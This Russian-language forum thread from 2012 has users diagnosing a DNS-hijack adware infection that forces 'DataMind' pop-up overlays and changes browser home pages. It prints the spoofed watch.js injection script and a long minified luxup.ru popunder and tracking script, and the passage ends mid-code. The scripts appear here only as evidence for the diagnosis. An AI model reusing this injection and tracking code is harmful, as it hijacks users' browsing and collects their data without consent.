tetiana пишет: Я точно знаю, кто это сделал: radikal.ruБред какой-то нет ничего на радикале, тебе показалось.

Ага. Точно. :D Ты бы погуглил для начала что ли. Например, вот. Не обязательно заходить на сам радикал. В некоторых случаях достаточно зайти на форум, где в посте есть фотка с радикала.

gjurza > 22-12-2012 00:57:18
tetiana пишет
archie пишет

Но вопрос остается - КТО ЭТО СДЕЛАЛ ???

Я точно знаю, кто это сделал: radikal.ru
Может, кто-то еще делает, но у меня без вариантов, загружала фотку и уже тогда у меня возникли подозрения, а после рестарта оперы началось...

У меня еще во всех браузерах стартовая поменялась на http://mailrusearchgo.ru

вот кстати вы правы на все 100% я сейчас вспомнил, что перед тем, как подхватил эту заразу заливал фотку на радикале... и сразу какая то дрянь начала ломиться, благо фаерволл ее чуть чуть остудил...

archie > 22-12-2012 09:17:20

На радикал я не заходил, но в то время заходил пару раз на форум, где были миниатюры с радикала.

Может, кто-нибудь все-таки знает, что это за прога и принцип ее работы?

archie > 22-12-2012 15:29:33

Вопрос еще открыт, знающие люди, подскажите, что за программа могла изменить реестр и как она могла попасть на комп? Я же ничего не скачивал и не устанавливал. Мог ли это сделать обычный сценарий javascript?

feas > 22-12-2012 16:06:52
archie пишет

Я же ничего не скачивал и не устанавливал.

Заразная флешка?

archie пишет

Мог ли это сделать обычный сценарий javascript?

Вполне. см Safe Browsing Tool | WOT ( Web of Trust )
Даже установка расширения к какой-то программе способна так сделать.

tetiana > 22-12-2012 16:49:47
archie пишет

Вопрос еще открыт, знающие люди, подскажите, что за программа могла изменить реестр и как она могла попасть на комп? Я же ничего не скачивал и не устанавливал. Мог ли это сделать обычный сценарий javascript?

Зайдите на радикал, загрузите любую фотку и скопируйте, например, верхнюю ссылку, как если бы собирались ее кому-нибудь отправить. В это время у вас будет открываться множество рекламных окон. Если ваша антивирусная программа еще не знакома с этой проблемой, то у вас в директории %Системный диск%:\Documents and Settings\%Имя юзера%\Local Settings\Temp появится экзешник с рандомным именем, который и является той самой "программой". Если у вас в этой директории много других файлов, то отличить нужный сможете по дате создания. Я практически уверена, что это Java/Exploit, поэтому кроме экзешника в темпах у вас появится что-то типа jar_cache%число%.tmp с той же датой/временем создания, что и экзешник.

Если вы хотите более подробных данных, то скачайте себе сниффер и FileMon и проделайте все то же самое, запустив эти программы. Получите подробный лог.

22-12-2012 17:03:03

okkamas_knife пишет

напрямую JS врядли ибо у того что на страничке нет столько прав хотя если нашли способ обходить то возможно (например у JS выполняющегося внутри расширения прав гораздо больше)

JS даже внутри расширения вряд ли может вносить изменения во ВСЕ браузеры. Это должен быть исполняемый файл (exe или bat). Но я знакома с JS на уровне веб-программиста, не более, поэтому не возьмусь утверждать на 100%

archie > 22-12-2012 19:34:31

Если честно, то уже надоело тратить время на всякую ерунду, как не одно, так другое... Пока разберешься с одной проблемой, еще какую-нибудь заразу придумают... Так, что решил полностью отказаться от винды, все-таки это уже прошлый век... В общем всем спасибо за ответы, тему можно закрывать.

WISTRON > 22-12-2012 23:19:22

Спасибо! За ваше расследование. Особенно archie, stealthm, gjurza.
Всем вам удачи, здоровья, долголетия! Очень помогли. Всех люблю, целую, обнимаю!

Этот вредный рекламный банер парализовал мою работу в интернете на несколько дней. И надо же - вот где искать никогда не додумаешься - проверить адрес DNS-серверов. Хотя мысли о том, что где-то именно в системе есть бяка, которая подключается к левому серву, только только начали приходить.

Начало стандартное: сначала (у меня прамо в яндексе) появилась зелёная заставка с предложением пройти тест. Удивлению не было предела - от Яндекса! Всплыващее окно: просто кошмар! Реклама системы DataMind - надпись сверху над блоками, скрипт, загружаемый из c.luxip.ru/..., и ссылки, ведущие на id123811.a120.luxup.ru/...

Cureit от DrWeb нашёл троянами инфицированных два екзешника в WINDOWS\TEMP и tmp-файл в Мои Документы и успешно удалил. Но проблема осталась - тизерное окно с рекламными квадратами продолжало регулярно и назойливо выскакивать. Не помогла ни одина из оказавшихся под рукой анти-блок/анти-малваре утилиток. Заражённая машина была заброшена до "когда руки дойдут". И сегодня случайно между делом попалась эта ветка с вашими поисками путей избавления от вредоносного ПО. Потом смотрю: и точно - прописан адрес 5.199.140.180.

И знаете что, я предполагаю, заражение произошло после перехода по укороченной ссылке. Мне несколько дней назад пришла смс-ка с МТС-го номера со словами: "вам фото от Саши. Посмотреть http://укороченная ссылка" (надо пояснить, что Саша, (вероятность, что и у вас какой-нибудь Саша в друзьях большая - согласитесь) вполне мог прислать фото, только номер-то чужой!). И я - этакая беспечность - возьми и вбей ссылку на компе. А там ничего, просто открылась главня гугла. Причём проверка ссылок, уже позже, у DrWeb ничего не нашла, хотя отметила тройную переадресацию, прежде чем добраться до google.ru, причём один из промежуточных адресов, содержащий goog1e- сразу насторожил. Прогон системы антивирусником ничего не дал. А потом началось: сменилась домашняя страница во всех браузерах, "пройдите бесплатное тестирование" и всплывающее окно DataMind на 70% монитора на любом из сайтов - во всех браузерах: в мозилле, в опере, в хроме, в интернет експлорере. Жуть! Впрочем, может и не из-за укороченной ссылки (всё-равно, знайте, и вам могут прислать). Может тоже где-то вроде радикала подхвачено.

Извините за объёмный текст, но так эти страницы чуть лучше будут искаться, и другим помогут.
Ещё раз благодарю всех!!!

datamind > 23-12-2012 18:54:00

Здравствуйте,
Хотим сообщить, что наша рекламная платформа Datamind не имеет отношения к вирусам, распространяемым злоумышленниками. Наши специалисты пытаются найти способы пресечения их деятельности.


archie пишет

Здравствуйте, пару дней назад появилась проблема.
При открытии разных сайтов, где раньше никогда не было рекламы, выскакивает рекламное окно. Вчера целый день выскакивала реклама marketgid, сегодня поменялось на "БЕСПЛАТНОЕ ТЕСТИРОВАНИЕ ОТ (название открываемого сайта)". На этом сайте выскочило то же самое окно.
Рекламное окно на javascript.
В других браузерах тоже самое.
Ось - вин хр.
Подскажите куда копать, не хочется менять браузер - привык уже, плюс много закладок.
Заранее спасибо за помощь.


Всем привет, немного разобрался в ситуации.

1. Дело не в браузере, в других браузерах вчера началось то же самое.
2. Проблема не в роутере и не в провайдере, на другом компе в локалке такого нет.

3. Начал копаться в html коде forum.mozilla-russia.org и кое-что нарыл:
В исходнике есть блок яндекс метрика, он загружает сценарий javascript по адресу  mc.yandex.ru/resource/watch.js, который поверх окна сайта выводит рекламное окно и загружает другой сценарий по адресу http://c.luxup.ru/t/lb123811.js, который в свою очередь скачивает картинки и заполняет ими уже созданное окно.
Окно вылазит не постоянно, а с разной периодичностью: иногда по адресу mc.yandex.ru/resource/watch.js лежит пустой файл и выполняться просто нечему.

На другом компе, где этой проблемы нет, набираю mc.yandex.ru/resource/watch.js, а там лежит обычный скрипт яндекс метрики, который никаких рекламных окон не загружает.
Естесственно сразу кинулся проверять файл hosts на предмет перенаправлений, но там все нормально.

У кого какие мысли по этому поводу?


  Watch.js

скрытый текст
function f_filterResults(n_win, n_docel, n_body) {
    var n_result = n_win ? n_win : 0;
    if (n_docel && (!n_result || (n_result > n_docel)))
        n_result = n_docel;
    return n_body && (!n_result || (n_result > n_body)) ? n_body : n_result;
}

function f_clientWidth() {
    return f_filterResults (
        window.innerWidth ? window.innerWidth : 0,
        document.documentElement ? document.documentElement.clientWidth : 0,
        document.body ? document.body.clientWidth : 0
    );
}
function f_clientHeight() {
    return f_filterResults (
        window.innerHeight ? window.innerHeight : 0,
        document.documentElement ? document.documentElement.clientHeight : 0,
        document.body ? document.body.clientHeight : 0
    );
}
function f_scrollLeft() {
    return f_filterResults (
        window.pageXOffset ? window.pageXOffset : 0,
        document.documentElement ? document.documentElement.scrollLeft : 0,
        document.body ? document.body.scrollLeft : 0
    );
}
function f_scrollTop() {
    return f_filterResults (
        window.pageYOffset ? window.pageYOffset : 0,
        document.documentElement ? document.documentElement.scrollTop : 0,
        document.body ? document.body.scrollTop : 0
    );
}

function popMove()
{
    popDiv = document.getElementById("popDiv");
    if(popDiv != null)
    {
        popDiv.style.left = ((f_clientWidth() - 850)/ 2) + f_scrollLeft () + "px";
        popDiv.style.top = ((f_clientHeight() - 550) / 2) + f_scrollTop () + "px";
    }
}

function popHide()
{
    popDiv = document.getElementById("popDiv");
    clearInterval(popMoveRun);
    popDiv.style.display = 'none';
    return false;
}

function popShowClose()
{
    popControl = document.getElementById("popControl");
    popControl.style.display = 'block';
}

if(typeof(popMutex) == "undefined" && typeof(hrMutex) == "undefined")
{
    var popMutex = true;
   
    var popDiv = document.createElement("div");
    popDiv.id = "popDiv";
    popDiv.style.position = "absolute";
    popDiv.style.width = "850px";
    popDiv.style.height = "550px";
    popDiv.style.backgroundColor = "white";
    popDiv.style.zIndex = "1000";
    popDiv.onclick = popShowClose;
    document.body.appendChild(popDiv);
   
    var advName = "DataMind";
    var popInfo = document.createElement("div");
    popInfo.id = "popInfo";
    popInfo.style.position = "absolute";
    popInfo.style.left = "10px";
    popInfo.style.fontSize = "11px";
    popInfo.style.fontWeight = "bold";
    popInfo.style.padding = "0 1px 25px";
    popInfo.style.height = "13px";
    popInfo.style.color = "black";
    popInfo.style.fontFamily = "Tahoma, Arial, sans-serif";
    popInfo.style.display = "block";
    popInfo.innerHTML = "Реклама системы " + advName + " <font color=\"red\">Посетите сайт спонсора чтобы продолжить просмотр сайта</font>";
    popDiv.appendChild(popInfo);
   
    var popControl = document.createElement("div");
    popControl.id = "popControl";
    popControl.style.position = "absolute";
    popControl.style.right = "10px";
    popControl.style.display = 'none';
    popDiv.appendChild(popControl);
   
    var popControlClose = document.createElement("a");
    popControlClose.href = "#";
    popControlClose.onclick = popHide;
    popControlClose.style.fontSize = "11px";
    popControlClose.style.fontWeight = "bold";
    popControlClose.style.padding = "0 1px 25px";
    popControlClose.style.color = "#096";
    popControlClose.style.height = "13px";
    popControlClose.style.fontFamily = "Tahoma, Arial, sans-serif";
    popControlClose.style.display = "block";
    popControlClose.innerHTML = "Закрыть";
    popControl.appendChild(popControlClose);
   
    var adDiv = document.createElement("div");
    adDiv.id = "lx_381874";
    adDiv.style.position = "absolute";
    adDiv.style.top = "15px";
    popDiv.appendChild(adDiv);
   
   
    var adScript = document.createElement("script");
    adScript.type = "text/javascript";
    adScript.language="JavaScript";
    adScript.charset = "utf-8";
    adScript.src = "http://c.luxup.ru/t/lb123811.js?rt=" + (new Date).getTime() % 1E7 * 100 + Math.round(Math.random() * 99) + (document.referrer ? ("&r=" + escape(document.referrer)) : "");
    document.body.appendChild(adScript);
   
    var popMoveRun = setInterval (popMove, 10);
    setTimeout(popShowClose, 10000);
}


lb123811.js
скрытый текст
(function(){var j=!0,l=null,z=!1;function A(){return function(){}}function e(a){return parseInt(a,10)}function oa(){return 100*((new Date).getTime()%1E7)+Math.round(99*Math.random())}function g(a){return"undefined"!=typeof a}function H(a,b){b||(b=A());var c=n.createElement("script");c.setAttribute(pa,qa);c.setAttribute("src",a);if(g(c))w?c.onreadystatechange=function(){("loaded"==this.readyState||"complete"==this.readyState)&&setTimeout(b,0)}:c.onload=function(){setTimeout(b,0)},N.appendChild(c)}function O(a){var b=n.createElement("style");b.setAttribute("rel",
"stylesheet");b.setAttribute(pa,"text/css");N.appendChild(b);w?b.styleSheet.cssText=a:b.appendChild(n.createTextNode(a))}function ra(){var a=z,b=navigator,c=l;if(g(b.plugins)&&"object"==typeof b.plugins["Shockwave Flash"]){if((c=b.plugins["Shockwave Flash"].description)&&(!g(b.mimeTypes)||!b.mimeTypes["application/x-shockwave-flash"]||b.mimeTypes["application/x-shockwave-flash"].enabledPlugin))c=c.replace(/^.*\s+(\S+\s+\S+$)/,"$1"),a=[0,0,0],a[0]=e(c.replace(/^(.*)\..*$/,"$1")),a[1]=e(c.replace(/^.*\.(.*)\s.*$/,
"$1")),a[2]=/[a-zA-Z]/.test(c)?e(c.replace(/^.*[a-zA-Z]+(.*)$/,"$1")):0}else if(g(f.ActiveXObject))try{var d=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");if(d&&(c=d.GetVariable("$version")))c=c.split(" ")[1].split(","),a=[e(c[0]),e(c[1]),e(c[2])]}catch(m){}return a=a!==z?a.join("."):a}function Qa(){var a=ra(),b="10.0.42".split(".");if(a===z)return z;a=a.split(".");b[0]=parseInt(b[0],10);b[1]=parseInt(b[1],10)||0;b[2]=parseInt(b[2],10)||0;return a[0]>b[0]||a[0]==b[0]&&a[1]>b[1]||a[0]==b[0]&&
a[1]==b[1]&&a[2]>=b[2]?a.join("."):z}function D(a,b,c){a.addEventListener?a.addEventListener(b,c,z):a.attachEvent("on"+b,c)}function Ra(a,b){a.innerHTML=b;for(var c=[],d=a.childNodes,m=0;d[m];m++)c&&d[m].nodeName&&"script"===d[m].nodeName.toLocaleLowerCase()&&(!d[m].type||"text/javascript"===d[m].type.toLowerCase())&&c.push(d[m].parentNode?d[m].parentNode.removeChild(d[m]):d[m]);for(var e in c){var d=c[e],m=d.text||d.textContent||d.innerHTML||"",f=n.createElement("script");f.type="text/javascript";
f.appendChild(n.createTextNode(m));N.insertBefore(f,N.firstChild);N.removeChild(f);d.parentNode&&d.parentNode.removeChild(d)}}function aa(){var a="",a="?rt="+oa();n.referrer&&(a+="&r="+escape(n.referrer));P&&(a+="&recurring=1");ba&&(a+="&flash="+escape(ba));w&&(a+="&isie=1");if(!f[h].popunderShow)for(var b in i)if(i.hasOwnProperty(b)&&"object"==typeof i[b]&&g(i[b].type)&&"popunder"==i[b].type){a+="&pu=1";break}a+="&f="+h;g(screen.width)&&(a+="&scr="+escape(screen.width+"x"+screen.height));return a+=
f[h].multishowsAdd?"&"+f[h].multishowsAdd:""}function Sa(a){for(var b=a.length,c=[],d=0;d<b;d++)c.push(a[d].l+";"+a[d].n.join(";"));ca&&H(ca+"?"+c.join("&"),A())}function Ta(){I&&(clearTimeout(I),I=l);for(var a=E.length,b=[],c=0;c<a;c++)if(E[c]){var d;a:{var m=E[c];if(m){var e=getElementsByClass("lx__tsb",m);d=[];for(var g=[],k=void 0,i=e.length,k=0;k<i;k++){var h;if(h=e[k])b:{h=e[k];if(!(0===h.offsetWidth||0===h.offsetHeight))for(var q=C&&!f.opera?s.clientHeight:u.clientHeight,o=C&&!f.opera?s.clientWidth:
u.clientWidth,r=h.getClientRects(),v=0,w=r.length;v<w;v++){var p=r[v],t=0<=p.left&&p.left+(p.width?p.width:p.right-p.left)<o,x;if(x=0<=p.top&&p.top+(p.height?p.height:p.bottom-p.top)<q){if(t){p=n.elementFromPoint((p.left+p.right)/2,(p.top+p.bottom)/2);if(p===h)p=j;else c:{if(p)for(p=p.parentNode;p!=l;){if(p==h){p=j;break c}p=p.parentNode}p=z}t=p}x=t}if(x){h=j;break b}}h=z}h&&(d.push(e[k].getAttribute("tsbid")),g.push(e[k]))}e=g.length;for(k=0;k<e;k++)h=g[k],h.className=h.className.replace(RegExp("(^|\\s)lx__tsb(\\s|$)",
"g"),"$1").replace(/\s+/g," ").replace(/(^ | $)/g,"");if(g=d.length){m=getElementsByClass("lx__tsbc",m);m=m[0];m=m.getAttribute("tsbc");d={n:d,all:i==g,l:m};break a}}d=z}if(d!==z){d.all&&delete E[c];i=d.n;m=[];g=0;k=i.length;a:for(;g<k;g++){e=0;for(h=m.length;e<h;e++)if(m[e]==i[g])continue a;m[m.length]=i[g]}b.push({n:m,l:d.l})}}b.length&&Sa(b)}function da(){I&&clearTimeout(I);I=setTimeout(Ta,1E3)}function sa(){t.demogr&&t.interests&&!t.sent&&H("http://"+S+"/set_li_stat/?sex="+t.sex+"&lage="+t.lage+
"&uage="+t.uage+"&interest="+t.interest,function(){t.sent=j})}function x(a,b){o.style[a]=b}function Ua(){f[b].bottomReady=function(a){a=e(a);o.childNodes[1].height=a+q;x("height",a+5+q)}}function ea(a){var b=a.toString(),b=b.substr(9),b=b.substr(0,b.indexOf("("));g(J[b])?(clearTimeout(J[b]),J[b]=setTimeout(function(){clearInterval(J[b]);a();delete J.C},ta)):(J[b]=setInterval(function(){a()},ta),a())}function ua(){ea(va)}function wa(){ea(T);w&&(ea(xa),setTimeout(T,250))}function xa(){x("width",s.clientWidth?
s.clientWidth:u.clientWidth)}function va(){fa(K,{bottom:j,right:j})}function T(){fa(o,{bottom:j})}function fa(a,b){var c=a.style;if(g(b[v])&&b[v]&&!g(a.d))a.d=e(a.currentStyle[v]),g(b[v])&&b[v]&&(c[v]=U);if(g(b.right)&&b.right&&!g(a.q)&&(a.q=e(a.currentStyle.right),g(b.right)&&b.right))c.right="";if(g(b.left)&&b.left&&!g(a.u))a.u=e(a.currentStyle.left);if(g(b[v])&&b[v])c.position=L,c.top=w?0-a.d-(e(c.height)?e(c.height):a.offsetHeight)+(s.clientHeight?s.clientHeight:u.clientHeight)+e(C&&!f.opera?
s.scrollTop:u.scrollTop)+q:0-a.d-e(c.height)+e(f.innerHeight)+e(f.pageYOffset)+q;if(g(b.right)&&b.right)c.position=L,C?c.right=a.q-(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q:c.left=0-a.q-(e(c.width)?e(c.width):a.offsetWidth)+(s.clientWidth?s.clientWidth:u.clientWidth)+(s.scrollLeft?s.scrollLeft:u.scrollLeft)+q;if(g(b.left)&&b.left)c.position=L,c.left=a.u+e(C&&!f.opera?s.scrollLeft:u.scrollLeft)+q}function ya(){var a=n.getElementsByTagName("object"),b=n.getElementsByTagName("embed"),c={m:z,w:[],embeds:[]};
if(V)for(var d=0;d<a.length;d++){for(var e=z,f=a[d].getElementsByTagName("param"),h=0;h<f.length;h++)if("wmode"==f[h].getAttribute("name").toLowerCase()){e=j;break}if(e)c.m=j,c.w.push(a[d])}for(d=0;d<b.length;d++){a=b[d].getAttribute("wmode");if(!(e=!a))g(a)?(a=a.toLowerCase(),a="transparent"!=a&&"opaque"!=a?z:j):a=z,e=!a;if(e)c.m=j,c.embeds.push(b[d])}return c}function Va(){for(var a=ya(),b=a.w,a=a.embeds,c=0;c<b.length;c++){var d=n.createElement("param");d.setAttribute("name","wmode");d.setAttribute("value",
"transparent");b[c].appendChild(d);b[c].outerHTML=b[c].outerHTML}for(c=0;c<a.length;c++)a[c].setAttribute("wmode","transparent"),a[c].outerHTML=a[c].outerHTML}function Q(a){var b=a.which?a.which:a.button,a=(w?a.srcElement:a.target).nodeName.toLowerCase();if(("a"==a||"img"==a)&&2!=b&&3!=b)clearTimeout(ga),ga=setTimeout(function(){ga=l;za()},500)}function Wa(){var a="";if(F)for(var b in i)i.hasOwnProperty(b)&&"object"==typeof i[b]&&(a+=escape(b.substr(1))+";");0<a.length&&(a=a.substring(0,a.length-
1));return a}function Aa(a){Ba(a.target?a.target:a.srcElement)}function Xa(a){var b=/\/i\/(a??)(\d+?)\//m,c=b.exec(a),d=z;if(c!=l&&16!=c){d=e(c[2]);d=(2*(10*d+40)-40)/10;16<=d&&(d=16);var f=10*d+40,d=a.replace(b,"/i/$1"+d+"/")}return{url:d,size:f}}function Ca(a){var b=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollTop:u.scrollTop),c=e(b+(C&&!f.opera?s.clientHeight:u.clientHeight)),d=e("CSS1Compat"==n.compatMode&&!f.opera?s.scrollLeft:u.scrollLeft),g=e(d+(C&&!f.opera?s.clientWidth:u.clientWidth)),
h=a.getClientRects()[0],i=Math.round(h.top)+b,k=Math.round(h.bottom)+b,o=Math.round(h.left)+d,h=Math.round(h.right)+d;if(i<b)a.style.top=e(a.style.top)+(b-i)+W+q;if(k>c)a.style.top=e(a.style.top)-(k-c)-W+q;if(o<d)a.style.left=e(a.style.left)+(d-o)+W+q;if(h>g)a.style.left=e(a.style.left)-(h-g)-W+q}function ha(a,b){clearTimeout(a.getAttribute("enlargeTimer"));var c=Da(b),d=e(a.height)-y;a.width=e(a.width)-y;a.height=d;d=e(c.left)>e(a.style.left)?e(a.style.left)+y/2:e(a.style.left)-y/2;a.style.top=(e(c.top)>
e(a.style.top)?e(a.style.top)+y/2:e(a.style.top)-y/2)+q;a.style.left=d+q;e(a.width)>e(b.width)?a.setAttribute("shrinkTimer",setTimeout(function(){ha(a,b)},R)):(a.style.top="-100000px",a.style.left="-100000px",b.style.visibility="",b.parentNode.style.zIndex="")}function Ea(a,b){clearTimeout(a.getAttribute("shrinkTimer"));var c=e(a.height)+y;a.width=e(a.width)+y;a.height=c;c=e(a.style.left)-y/2;a.style.top=e(a.style.top)-y/2+q;a.style.left=c+q;Ca(a);e(a.width)<b&&a.setAttribute("enlargeTimer",setTimeout(function(){Ea(a,
b)},R))}function Da(a){for(var b=0,c=0;a&&"relative"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position&&"absolute"!=(a.p=a.p||a.currentStyle||getComputedStyle(a,0)).position;)b+=e(a.offsetTop),c+=e(a.offsetLeft),a=a.offsetParent;return{top:b,left:c}}function Ba(a){var b,c=Da(a),d=Xa(a.src),e=d.size;if((d=d.url)||d!=a.src){a.previousSibling&&"img"==a.previousSibling.nodeName.toLowerCase()?b=a.previousSibling:(b=a.cloneNode(z),w&&b.detachEvent("onmouseover",Aa),b.style.position=L,b.style.top=
"-100000px",b.style.left="-100000px",b.style.margin="0px",n.addEventListener?b.addEventListener("mouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))},z):b.attachEvent("onmouseout",function(){clearTimeout(b.getAttribute("enlargeTimer"));b.setAttribute("shrinkTimer",setTimeout(function(){ha(b,a)},R))}),a.parentNode.insertBefore(b,a));if(b.src==a.src){var f=b.cloneNode(z);D(f,"load",function(){b.src=f.src;setTimeout(function(){f.parentNode.removeChild(f)},
100)});f.src=d;b.parentNode.insertBefore(f,b)}b.width=a.width;b.height=a.height;b.style.top=c.top+q;b.style.left=c.left+q;a.style.visibility="hidden";a.parentNode.style.zIndex=1E5;Ca(b);b.setAttribute("enlargeTimer",setTimeout(function(){Ea(b,e)},R))}}function Ya(a,b){b&&(D(n,ia,Fa(a)),X&&(Y(a)(),D(f,"resize",Ga(a)),D(f,ia,Ga(a))));for(var c=getElementsByClass("close",a.a),d=c.length,e=0;e<d;e++)D(c[e],ja,Za(a));c=getElementsByClass("ref",a.a);d=c.length;for(e=0;e<d;e++)D(c[e],ja,Ha(a))}function Za(a){return function(b){if(b||
f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;a.s=j;ka(a);b=new Date;b.setTime(b.getTime()+36E5*$a);n.cookie="_lxretpopupignore=1; path=/; expires="+b.toUTCString()}}function Ha(a){return function(b){if(b||f.event)b=b||f.event,b.stopPropagation?b.stopPropagation():b.cancelBubble=j;clearTimeout(a.i);a.j=j;ka(a,function(){H(la+a.B+"/"+aa(),A())})}}function Fa(a){return function(){if(!a.s&&!a.j){var b=e(s.scrollTop?s.scrollTop:u.scrollTop);!a.k&&b>=a.v?ab(a):a.k&&b<a.v&&
ka(a)}}}function Y(a){return function(){a.a[a.b+"Offset"]=e(a.a.style[a.b]);var b={bottom:j};a.b==Ia&&(b[Ia]=j);a.b==Ja&&(b[Ja]=j);fa(a.a,b)}}function Ga(a){return function(){g(a.t)&&clearTimeout(a.t);a.t=setTimeout(Y(a),100)}}function Ka(a){var b=0;return b=X?a.a[a.b+"Offset"]:e(a.a.style[a.b])}function ab(a){a.k=j;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.i=setTimeout(Ha(a),1E3*a.refresh);a.a.style.display="block";a.c=setInterval(function(){var b=Ka(a),c=b+La;0>b&&0>c?(a.h=j,a.a.style[a.b]=
c+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=0+q);X&&Y(a)()},Ma)}function ka(a,b){a.k=z;g(a.c)&&clearInterval(a.c);clearTimeout(a.i);a.c=setInterval(function(){var c=Ka(a),d=c-La;c>=-a.width&&d>-a.width?(a.h=j,a.a.style[a.b]=d+q):(clearInterval(a.c),a.h=z,a.a.style[a.b]=-a.width+q,a.a.style.display="none",g(b)&&b());X&&Y(a)()},Ma)}function za(a){if(!Z){Z=j;var b=Wa();b&&(a?(n.write('<scr'+'ipt type="'+qa+'" language="JavaScr'+'ipt" src="'+la+b+"/"+aa()+'"><\/scr'+'ipt>'),Z=z):H(la+b+"/"+aa(),function(){Z=
z}))}}var i={"_336612":{id:"lx_336612"},"_381874":{id:"lx_381874",A:!0}},h="__lxG123811__",B="__lxG__",G={},n=document,f=window,u=n.body,s=n.documentElement,N=function(){var a=n.getElementsByTagName("head")[0];if(a)return a;for(a=s.firstChild;a&&"#text"==a.nodeName.toLowerCase();)a=a.nextSibling;if(a&&"#text"!=a.nodeName.toLowerCase())return a;a=n.createElement("head");
s.appendChild(a);return a}(),$=navigator.userAgent.toLowerCase(),w=/msie/.test($)&&!/opera/.test($),bb=(navigator.userAgent.toLowerCase().match(/.+(?:rv|it|ra|ie)[\/: ]([\d.]+)/)||[])[1],C="CSS1Compat"===n.compatMode,ma=/chrome/.test($),V=/opera/.test($),P=z,Z=z,ga=l,F=0,E=[],I=l,ba=ma?Qa():ra(),Na=z,K=l,o=l,ta=50,na=l,Oa=z,v="bottom",q="px",L="absolute",r={},qa="text/javascript",pa="type",U="auto",M="",Pa=z,ca="",W=3,y=10,R=10,Ja="right",Ia="left",ia="scroll",ja="click",$a=480,Ma=15,La=22,X=w&&(!C||
8>e(bb)&&C),S="luxup.ru",la="http://"+S+"/multishows/",J={},t={demogr:z,interests:z,sent:z};getElementsByClass=n.getElementsByClassName?function(a,b){return(b||document).getElementsByClassName(a)}:function(a,b){var c=(b||document).getElementsByTagName("*"),d=c.length,e=a.split(/\s+/),f=e.length,h=[],g,i;for(g=0;g<d;g++)for(i=0;i<f;i++)if(-1!=c[g].className.search("\\b"+e[i]+"\\b")){h.push(c[g]);break}return h};D(f,ia,da);G[h]={};G[h].g=function(){if(!M)return j;M+="?rnd="+oa()+(f[h].popunderAdd?"&"+
f[h].popunderAdd:"");var a=window;window.open(M,h+"popunder","toolbar=1,location=1,status=1, menubar=1,scrollbars=1,resizable=1");M="";a.focus();u.detachEvent?(u.detachEvent("onclick",G[h].g),u.releaseCapture()):(u.removeEventListener("click",G[h].g,j),u.removeEventListener("click",G[h].g));return j};g(f[h])||(f[h]={});g(f[b])||(f[b]={});f[h].closed=A();f[h].clicked=A();if(!g(f[h].popunderShow))f[h].popunderShow=z;if(!g(f[h].allLoaded))f[h].allLoaded=A();if(!g(f[h].popunderAdd))f[h].popunderAdd="";
if(!g(f[h].multishowsAdd))f[h].multishowsAdd="";f[b].demogr=function(a){t.sex=encodeURIComponent(a.gen);t.lage=encodeURIComponent(a.lage);t.uage=encodeURIComponent(a.uage);t.demogr=j;sa()};f[b].interests=function(a){t.interest=encodeURIComponent(a.hier_inter.join(","));t.interests=j;sa()};f[h].parser=function(a){E=[];for(var b in a)if(a.hasOwnProperty(b)){var c=a[b];if("cfg"==c.type)c.hasOwnProperty("realShowsUrl")&&(ca=c.realShowsUrl),c.hasOwnProperty("getLiData")&&setTimeout(function(){H("http://medianet.yadro.ru/hier_inter.txt",
A());H("http://medianet.yadro.ru/info.txt",A())},0);else if("counters"==c.type){if(c.hasOwnProperty("urls"))for(var d=0;d<c.urls.length;d++)(new Image).src=c.urls[d]}else if(g(i["_"+c.id])&&g(c.source)&&c.source){if((d=n.getElementById(i["_"+c.id].id))&&"html"==c.type)if(P||(O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),d.innerHTML=c.source,i["_"+c.id].f=j,getElementsByClass("lx__tsbc",d).length&&E.push(d),g(i["_"+c.id].A)&&i["_"+c.id].A)for(var m=d.getElementsByTagName("img"),
s=m.length,t=0;t<s;t++)n.addEventListener?m[t].addEventListener("mouseover",function(){Ba(this)},z):m[t].attachEvent("onmouseover",Aa);if(d&&"pu"==c.type&&!Pa)M="http://c."+S+"/pu/"+c.id+".html",n.addEventListener?u.addEventListener("click",G[h].g,j):(u.attachEvent("onclick",G[h].g),u.setCapture(j)),Pa=i["_"+c.id].f=j;if(d&&"js"==c.type)P||(g(c.style)&&O(c.style),n.addEventListener?d.addEventListener("click",Q,z):d.attachEvent("onclick",Q)),Ra(d,c.source),i["_"+c.id].f=j;if(d&&"flash"==c.type&&!Na)K=
d,O(c.style),f[h].closed=function(){K.parentNode.removeChild(K)},f[h].clicked=function(){K.parentNode.removeChild(K)},d.innerHTML=c.source,i["_"+c.id].f=j,w&&(f.attachEvent("onscroll",ua),f.attachEvent("onresize",ua),va()),Na=j,getElementsByClass("lx__tsbc",d).length&&E.push(d);if(d&&c.type==v)o=d,(V||ma)&&Oa&&g(i["_"+c.id].z)&&i["_"+c.id].z&&Va(),""!=c.style&&O(c.style),w?o.e=e(o.currentStyle[v]):(o.e=e(n.defaultView.getComputedStyle(o,l).bottom),V&&(o.e-=1)),f[b].bottomClosed=function(){var a=n.createElement("a");
a.innerHTML=".";a.href="medianet.adlabs.ru";o.appendChild(a);a.focus();a.blur();o.style.display="none";da()},x("position",L),x(v,U),x("top","-100000px"),x("zIndex",99999),f[b].bottomReady=function(a,b){a=e(a);if(150<a)return z;o.childNodes[1].height=a+q;x(v,"-"+(a+5+10)+q);x("top","");w?x("position",L):x("position","fixed");if(w){if(0!=b)xa(),clearInterval(na),f[b].bottomReady=A()}else f[b].bottomReady=A();na=setInterval(function(){var a=w&&g(o.d)?o.d:e(o.style[v]);if(a<o.e&&!(6.25>o.e-a)){if(x(v,
